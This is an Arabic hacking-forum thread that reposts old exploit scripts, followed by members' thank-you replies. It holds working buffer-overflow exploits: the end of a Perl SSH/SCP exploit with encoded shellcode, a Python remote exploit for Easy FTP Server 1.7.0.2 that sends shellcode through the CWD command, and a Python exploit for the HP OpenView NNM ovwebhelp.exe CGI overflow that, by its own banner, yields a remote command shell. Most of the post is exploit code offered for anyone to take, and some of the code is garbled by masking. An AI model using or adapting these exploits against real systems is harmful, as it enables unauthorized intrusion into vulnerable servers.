"\x4b\x5a\x46\x6f\x49\x4f\x49\x70\x4b\x4f\x4a\x75\ x4d\x59" .

"\x4b\x77\x43\x58\x4c\x6c\x44\x50\x47\x6d\x4b\x30\ x50\x68" .

"\x44\x42\x45\x50\x46\x71\x51\x4c\x4f\x79\x49\x76\ x50\x6a" .

"\x46\x70\x50\x56\x51\x47\x42\x48\x4a\x39\x4f\x55\ x51\x64" .

"\x45\x31\x4b\x4f\x4a\x75\x50\x68\x42\x43\x50\x6d\ x45\x34" .

"\x45\x50\x4e\x69\x4a\x43\x50\x57\x50\x57\x46\x37\ x45\x61" .

"\x48\x76\x50\x6a\x44\x52\x43\x69\x42\x76\x4a\x42\ x4b\x4d" .

"\x43\x56\x4a\x67\x51\x54\x44\x64\x47\x4c\x43\x31\ x45\x51" .

"\x4e\x6d\x42\x64\x45\x74\x44\x50\x4a\x66\x47\x70\ x43\x74" .

"\x50\x54\x46\x30\x43\x66\x43\x66\x46\x36\x47\x36\ x42\x76" .

"\x50\x4e\x51\x46\x43\x66\x46\x33\x46\x36\x50\x68\ x51\x69" .

"\x4a\x6c\x45\x6f\x4b\x36\x49\x6f\x4b\x65\x4b\x39\ x49\x70" .

"\x50\x4e\x50\x56\x47\x36\x49\x6f\x46\x50\x43\x58\ x46\x68" .

"\x4e\x67\x45\x4d\x43\x50\x4b\x4f\x49\x45\x4d\x6b\ x4a\x50" .

"\x4e\x55\x49\x32\x43\x66\x50\x68\x49\x36\x4a\x35\ x4d\x6d" .

"\x4d\x4d\x4b\x4f\x4a\x75\x45\x6c\x45\x56\x51\x6c\ x45\x5a" .

"\x4b\x30\x4b\x4b\x49\x70\x42\x55\x43\x35\x4f\x4b\ x47\x37" .

"\x46\x73\x43\x42\x42\x4f\x51\x7a\x43\x30\x50\x53\ x49\x6f" .

"\x48\x55\x47\x7a\x41\x41";



# jmp esp 0x77dc7c7b user32.dll



$fuzz = "\x41"x490 . "\x7b\x7c\xdc\x77". "\x90"x1000 . $****************l;





$ssh2 = net::ssh2->new();

$ssh2->connect($host, $port) || die "\nerror: Connection refused!\n";

$ssh2->auth_password($username, $password) || die "\nerror: Username/password denied!\n";

$scpget = $ssh2->scp_get($fuzz);

$ssh2->disconnect();


# title: Easy ftp server v1.7.0.2 cwd remote bof
# edb-id: 11539
# cve-id: ()
# osvdb-id: ()
# author: Athleet
# published: 2010-02-22
# verified: Yes
# download exploit code
# download vulnerable app

view sourceprint?# tested on: Xp sp3 (eng)

#!/usr/bin/python

import socket, sys



print """

*************************************************

* easy ftp server 1.7.0.2 remote bof *

* discovered by: Athleet *

* jonbutler88[at]googlemail[dot]com *

*************************************************

"""



if len(sys.argv) != 3:

Print "usage: ./easyftp.py <target ip> <port>"

sys.exit(1)



target = sys.argv[1]

port = int(sys.argv[2])



# calc.exe poc ****************lcode - tested on xp pro sp3 (eng)

#

# b *0x009afe44

#

****************lcode = (

"\xba\x20\xf0\xfd\x7f" # mov edx,7ffdf020

"\xc7\x02\x4c\xaa\xf8\x77" # mov dword ptr ds:[edx],77f8aa4c

"\x33\xc0" # xor eax,eax

"\x50" # push eax

"\x68\x63\x61\x6c\x63" # push 636c6163

"\x54" # push esp

"\x5b" # pop ebx

"\x50" # push eax

"\x53" # push ebx

"\xb9\xc7\x93\xc2\x77" # mov ecx,77c293c7

"\xff\xd1" # call ecx

"\xeb\xf7" # jmp short 009afe5b

)



nopsled = "\x90" * (268 - len(****************lcode))



ret = "\x58\xfd\x9a\x00"



payload = nopsled + ****************lcode + ret # 272 bytes



print "[+] launching exploit against " + target + "..."

s=socket.socket(socket.af_inet, socket.sock_stream)

try:

Connect=s.connect((target, port))

print "[+] connected!"

except:

Print "[!] connection failed!"

sys.exit(0)

s.recv(1024)

s.send('user anonymous\r\n')

s.recv(1024)

s.send('pass anonymous\r\n')

s.recv(1024)

# send payload...

Print "[+] sending payload..."

s.send('cwd ' + payload + '\r\n')

try:

S.recv(1024)

print "[!] exploit failed..."

except:

Print "[+] exploited ^_^"

# title: Hp openview nnm ov************help.exe cgi topic overflow
# edb-id: 11974
# cve-id: ()
# osvdb-id: ()
# author: S2 crew
# published: 2010-03-30
# verified: No
# download exploit code
# download vulnerable app

view sourceprint?#!/usr/bin/python



# exploit title: Hp openview nnm ov************help.exe cgi topic overflow

# date: 2010.03.30

# software link: Hp.com<http://hp.com>

# version: 7.53

# tested on: Windows 2003 sp2

# cve: 2009-4178

# code:

############################################

# trying 172.16.29.130...

# connected to 172.16.29.130.

# escape character is '^]'.

# microsoft windows [version 5.2.3790]

# (c) copyright 1985-2003 microsoft corp.

#

# c:\program files\hp openview\www\cgi-bin>

############################################



import struct

import socket

import httplib

import urllib



#[*] x86/alpha_mixed succeeded with size 746 (iteration=1)

sc =(

"\x89\xe3\xd9\xc3\xd9\x73\xf4\x5d\x55\x59\x49\x49\ x49\x49\x49"

"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\ x51\x5a\x6a"

"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\ x41\x42\x32"

"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\ x75\x4a\x49"

"\x4b\x4c\x49\x78\x4e\x69\x45\x50\x45\x50\x43\x30\ x45\x30\x4e"

"\x69\x48\x65\x44\x71\x4b\x62\x45\x34\x4e\x6b\x51\ x42\x44\x70"

"\x4c\x4b\x43\x62\x44\x4c\x4e\x6b\x50\x52\x44\x54\ x4e\x6b\x43"

"\x42\x45\x78\x44\x4f\x4e\x57\x50\x4a\x45\x76\x50\ x31\x4b\x4f"

"\x46\x51\x49\x50\x4c\x6c\x45\x6c\x43\x51\x43\x4c\ x45\x52\x46"

"\x4c\x47\x50\x4f\x31\x48\x4f\x44\x4d\x43\x31\x49\ x57\x4b\x52"

"\x48\x70\x51\x42\x43\x67\x4c\x4b\x50\x52\x46\x70\ x4e\x6b\x47"

"\x32\x45\x6c\x47\x71\x48\x50\x4c\x4b\x47\x30\x44\ x38\x4f\x75"

"\x49\x50\x50\x74\x51\x5a\x43\x31\x4a\x70\x42\x70\ x4c\x4b\x43"

"\x78\x46\x78\x4e\x6b\x43\x68\x45\x70\x47\x71\x48\ x53\x4a\x43"

"\x45\x6c\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x47\x71\ x4a\x76\x44"

"\x71\x4b\x4f\x45\x61\x49\x50\x4c\x6c\x4b\x71\x4a\ x6f\x44\x4d"

"\x45\x51\x4a\x67\x47\x48\x4b\x50\x43\x45\x4b\x44\ x46\x63\x51"

"\x6d\x49\x68\x45\x6b\x51\x6d\x46\x44\x43\x45\x4d\ x32\x46\x38"

"\x4e\x6b\x42\x78\x44\x64\x45\x51\x49\x43\x45\x36\ x4c\x4b\x44"

"\x4c\x50\x4b\x4e\x6b\x50\x58\x47\x6c\x45\x51\x49\ x43\x4e\x6b"

"\x46\x64\x4e\x6b\x47\x71\x4e\x30\x4f\x79\x50\x44\ x46\x44\x51"

"\x34\x43\x6b\x43\x6b\x43\x51\x51\x49\x42\x7a\x46\ x31\x49\x6f"

"\x4b\x50\x50\x58\x43\x6f\x50\x5a\x4c\x4b\x44\x52\ x48\x6b\x4b"

"\x36\x51\x4d\x51\x78\x45\x63\x46\x52\x43\x30\x43\ x30\x43\x58"

"\x42\x57\x42\x53\x46\x52\x51\x4f\x50\x54\x51\x78\ x42\x6c\x50"

"\x77\x47\x56\x47\x77\x4b\x4f\x4b\x65\x4c\x78\x4a\ x30\x47\x71"

"\x47\x70\x43\x30\x51\x39\x49\x54\x51\x44\x50\x50\ x45\x38\x46"

"\x49\x4d\x50\x50\x6b\x43\x30\x49\x6f\x49\x45\x50\ x50\x42\x70"

"\x50\x50\x42\x70\x43\x70\x50\x50\x47\x30\x50\x50\ x51\x78\x49"

"\x7a\x44\x4f\x49\x4f\x4b\x50\x4b\x4f\x4b\x65\x4e\ x69\x4f\x37"

"\x50\x31\x49\x4b\x51\x43\x45\x38\x44\x42\x47\x70\ x47\x61\x51"

"\x4c\x4e\x69\x4b\x56\x43\x5a\x46\x70\x42\x76\x51\ x47\x50\x68"

"\x4b\x72\x49\x4b\x44\x77\x43\x57\x4b\x4f\x49\x45\ x50\x53\x43"

"\x67\x45\x38\x48\x37\x49\x79\x44\x78\x49\x6f\x4b\ x4f\x4e\x35"

"\x51\x43\x51\x43\x51\x47\x45\x38\x50\x74\x48\x6c\ x47\x4b\x49"

"\x71\x49\x6f\x4a\x75\x42\x77\x4d\x59\x48\x47\x51\ x78\x44\x35"

"\x42\x4e\x42\x6d\x50\x61\x49\x6f\x49\x45\x50\x68\ x42\x43\x42"

"\x4d\x51\x74\x43\x30\x4d\x59\x49\x73\x50\x57\x46\ x37\x43\x67"

"\x50\x31\x48\x76\x42\x4a\x45\x42\x46\x39\x46\x36\ x4d\x32\x49"

"\x6d\x42\x46\x48\x47\x43\x74\x46\x44\x47\x4c\x47\ x71\x43\x31"

"\x4e\x6d\x43\x74\x51\x34\x46\x70\x4f\x36\x43\x30\ x42\x64\x46"

"\x34\x42\x70\x50\x56\x50\x56\x43\x66\x42\x66\x51\ x46\x50\x4e"

"\x46\x36\x43\x66\x46\x33\x43\x66\x51\x78\x44\x39\ x48\x4c\x47"

"\x4f\x4c\x46\x4b\x4f\x4b\x65\x4e\x69\x4d\x30\x42\ x6e\x50\x56"

"\x43\x76\x49\x6f\x46\x50\x43\x58\x44\x48\x4d\x57\ x47\x6d\x51"

"\x70\x49\x6f\x4a\x75\x4d\x6b\x4c\x30\x4c\x75\x4f\ x52\x43\x66"

"\x42\x48\x4d\x76\x4f\x65\x4d\x6d\x4f\x6d\x49\x6f\ x48\x55\x47"

"\x4c\x47\x76\x43\x4c\x45\x5a\x4b\x30\x4b\x4b\x4d\ x30\x44\x35"

"\x43\x35\x4f\x4b\x51\x57\x42\x33\x51\x62\x50\x6f\ x43\x5a\x45"

"\x50\x42\x73\x49\x6f\x4a\x75\x46\x6a\x41\x41" )



data="a"*57

data2 = "b"*5000

ret = "\xdf\xf2\xe5\x77" + "\x90" * 254 + sc # call esp kernel32.dll

payload = data + ret



p = urllib.urlencode({'topic':payload,'target':data2})

h = {"content-type": "application/x-www-form-urlencoded","accept": "text/html","user-agent": "backtrack", "accept-language": "en"}



c = httplib.httpconnection('172.16.29.130')

c.request("post","/ovcgi/ov************help.exe",p,h)

r = c.getresponse()



print r.status, r.reason

c.close()



print "\ndone\n"
ثغرات متنوعه كلها 2010 ان لقيت شئ تستفيد منه خذه وان مالقيت بلاش انتقادات ودمتم بود
  #4
X-LiiN3
DeveloPer Plus
 
الصورة الرمزية X-LiiN3
 
   تاريخ التسجيل: 11 - 1 - 2010
   رقم العضوية : 88359
   المشاركات : 913
   بمعدل : 0.51 يوميا
   عدد النقاط : 706


X-LiiN3 is a splendid one to beholdX-LiiN3 is a splendid one to beholdX-LiiN3 is a splendid one to beholdX-LiiN3 is a splendid one to beholdX-LiiN3 is a splendid one to beholdX-LiiN3 is a splendid one to beholdX-LiiN3 is a splendid one to behold

X-LiiN3 غير متواجد حالياً




افتراضي رد: ثغرات متنوعه قديم اضيفت بتاريخ 22-Apr-2010, 01:22 AM بواسطة WEB

الله يعطيك العافيه ياغالي
توقيع X-LiiN3

Moroccan Boiling BloodS
  #5
HaCkEr-By-MaROcO
~داعس الحمايات~
 
الصورة الرمزية HaCkEr-By-MaROcO
 
   تاريخ التسجيل: 24 - 10 - 2009
   رقم العضوية : 80325
   المشاركات : 1,834
   بمعدل : 0.97 يوميا
   عدد النقاط : 327


HaCkEr-By-MaROcO is a jewel in the roughHaCkEr-By-MaROcO is a jewel in the roughHaCkEr-By-MaROcO is a jewel in the roughHaCkEr-By-MaROcO is a jewel in the rough

HaCkEr-By-MaROcO غير متواجد حالياً




افتراضي رد: ثغرات متنوعه قديم اضيفت بتاريخ 22-Apr-2010, 01:45 AM بواسطة WEB

يعطيك العافية
بس لو رفتهم راح يكون احسن

****************
تقيم
توقيع HaCkEr-By-MaROcO


  #6
DANGER M@N
ExpErt DeveloPer
 
الصورة الرمزية DANGER M@N
 
   تاريخ التسجيل: 26 - 12 - 2009
   رقم العضوية : 84710
   العمر : 29
   المشاركات : 2,734
   بمعدل : 1.50 يوميا
   عدد النقاط : 1247


DANGER M@N has much to be proud ofDANGER M@N has much to be proud ofDANGER M@N has much to be proud ofDANGER M@N has much to be proud ofDANGER M@N has much to be proud ofDANGER M@N has much to be proud ofDANGER M@N has much to be proud ofDANGER M@N has much to be proud ofDANGER M@N has much to be proud of

DANGER M@N غير متواجد حالياً




افتراضي رد: ثغرات متنوعه قديم اضيفت بتاريخ 22-Apr-2010, 02:03 AM بواسطة WEB

ماشاء الله

ما كنت اظن ان هناك مواضيع بهذا الطول حتى رايت موضوعك

الله يعينك

وفى انتظار المزيد
  #7
شـgقـgلآطه
ExpErt DeveloPer
 
الصورة الرمزية شـgقـgلآطه
 
   تاريخ التسجيل: 26 - 12 - 2009
   رقم العضوية : 84369
   المشاركات : 8,094
   بمعدل : 4.44 يوميا
   عدد النقاط : 25762


شـgقـgلآطه has a reputation beyond reputeشـgقـgلآطه has a reputation beyond reputeشـgقـgلآطه has a reputation beyond reputeشـgقـgلآطه has a reputation beyond reputeشـgقـgلآطه has a reputation beyond reputeشـgقـgلآطه has a reputation beyond reputeشـgقـgلآطه has a reputation beyond reputeشـgقـgلآطه has a reputation beyond reputeشـgقـgلآطه has a reputation beyond reputeشـgقـgلآطه has a reputation beyond reputeشـgقـgلآطه has a reputation beyond repute

شـgقـgلآطه غير متواجد حالياً




افتراضي رد: ثغرات متنوعه قديم اضيفت بتاريخ 22-Apr-2010, 07:18 AM بواسطة WEB

يعطيك العافيه

واخليها لغيري يستفيد منها


توقيع شـgقـgلآطه

رحمك الله يـوالدتي وأسكنك فسيح جناته
  #8
حلمي أكون هكر
Active DeveloPer
 
الصورة الرمزية حلمي أكون هكر
 
   تاريخ التسجيل: 5 - 11 - 2009
   رقم العضوية : 82825
   المشاركات : 563
   بمعدل : 0.30 يوميا
   عدد النقاط : 114


حلمي أكون هكر will become famous soon enoughحلمي أكون هكر will become famous soon enough

حلمي أكون هكر غير متواجد حالياً




افتراضي رد: ثغرات متنوعه قديم اضيفت بتاريخ 22-Apr-2010, 08:24 AM بواسطة WEB

يعطيك العافيه مجهود حلو
  #9
ديـہـونجـہـي الـہـًزرقـہـًآء
آڵڍۋٲيـمـة
 
الصورة الرمزية ديـہـونجـہـي الـہـًزرقـہـًآء
 
   تاريخ التسجيل: 28 - 12 - 2009
   رقم العضوية : 85665
   المشاركات : 2,157
   بمعدل : 1.19 يوميا
   عدد النقاط : 3026


ديـہـونجـہـي الـہـًزرقـہـًآء has a reputation beyond reputeديـہـونجـہـي الـہـًزرقـہـًآء has a reputation beyond reputeديـہـونجـہـي الـہـًزرقـہـًآء has a reputation beyond reputeديـہـونجـہـي الـہـًزرقـہـًآء has a reputation beyond reputeديـہـونجـہـي الـہـًزرقـہـًآء has a reputation beyond reputeديـہـونجـہـي الـہـًزرقـہـًآء has a reputation beyond reputeديـہـونجـہـي الـہـًزرقـہـًآء has a reputation beyond reputeديـہـونجـہـي الـہـًزرقـہـًآء has a reputation beyond reputeديـہـونجـہـي الـہـًزرقـہـًآء has a reputation beyond reputeديـہـونجـہـي الـہـًزرقـہـًآء has a reputation beyond reputeديـہـونجـہـي الـہـًزرقـہـًآء has a reputation beyond repute

ديـہـونجـہـي الـہـًزرقـہـًآء غير متواجد حالياً




افتراضي رد: ثغرات متنوعه قديم اضيفت بتاريخ 22-Apr-2010, 12:46 PM بواسطة WEB

لا تحرمنا جديدك يا وحش
توقيع ديـہـونجـہـي الـہـًزرقـہـًآء


مواقع النشر (المفضلة)


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is في
كود HTML معطلة
Trackbacks are في
Pingbacks are في
Refbacks are في


Google+

الساعة الآن 06:26 AM

Powered by Devpoint, Inc. community
Copyrights for vBulletin Inc.
Devpoint v3.0 preview - Build 1402.11

نظام الترقية - الحسابات الموثوقة - خصوصية الموقع - [ Dev-PoinT ] - الأعلى




SEO by vBSEO 3.6.0 PL2 ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180